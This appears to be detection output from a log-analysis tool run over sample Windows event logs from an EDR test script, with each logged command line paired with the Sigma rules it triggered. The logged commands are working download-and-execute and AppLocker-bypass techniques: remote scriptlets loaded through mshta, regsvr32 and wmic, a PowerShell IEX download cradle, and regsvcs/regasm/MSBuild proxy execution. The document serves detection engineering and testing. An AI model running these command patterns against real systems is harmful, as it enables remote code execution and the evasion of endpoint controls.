+2019-07-30 06:33:18.286 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close();  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:18.310 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: mshta.exe  javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close();  :  Path: C:\Windows\System32\mshta.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close();",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,Mshta JavaScript Execution,,rules/sigma/process_creation/win_mshta_javascript.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:20.186 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe""   :  Path: C:\Windows\System32\calc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: mshta.exe  javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close();",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:21.567 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:23.215 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:23.215 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:23.215 +09:00,MSEDGEWIN10,1,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:23.232 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell  -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))""  :  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Suspicious XOR Encoded PowerShell Command Line,,rules/sigma/process_creation/win_powershell_xor_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,PowerShell Download from URL,,rules/sigma/process_creation/win_powershell_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Encoded PowerShell Command Line,,rules/sigma/process_creation/win_powershell_cmdline_specific_comb_methods.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:24.563 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe""   :  Path: C:\Windows\System32\calc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell  -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:24.563 +09:00,MSEDGEWIN10,1,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:25.202 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:28.250 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:28.250 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:28.374 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe AllTheThings.dll  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:28.374 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:29.341 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe  AllTheThings.dll  :  Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:29.341 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:29.565 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe AllTheThings.dll  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:29.565 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:29.646 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:29.646 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:30.074 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:34.295 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe /U AllTheThings.dll  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:34.295 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:34.411 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe /U AllTheThings.dll  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:34.411 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:34.483 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:39.312 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:39.312 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:39.358 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:39.358 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:39.372 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:39.907 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe  /U AllTheThings.dll  :  Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:39.907 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:44.268 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:44.287 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: regsvr32.exe  /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll  :  Path: C:\Windows\System32\regsvr32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:45.581 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe""   :  Path: C:\Windows\System32\calc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: regsvr32.exe  /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:46.095 +09:00,MSEDGEWIN10,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:49.748 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:49.748 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:49.889 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:50.104 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe  xxxFile.csproj  :  Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:50.104 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:53.776 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:53.843 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wmic  process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl""  :  Path: C:\Windows\System32\wbem\WMIC.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,medium,SquiblyTwo,,rules/sigma/process_creation/win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:54.630 +09:00,MSEDGEWIN10,11,high,Windows Shell File Write to Suspicious Folder,,rules/sigma/file_event/file_event_win_shell_write_susp_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:54.718 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe""   :  Path: C:\Windows\System32\calc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: wmic  process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:58.256 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl      :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:58.256 +09:00,MSEDGEWIN10,1,medium,Capture a Network Trace with netsh.exe,,rules/sigma/process_creation/win_netsh_packet_capture.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
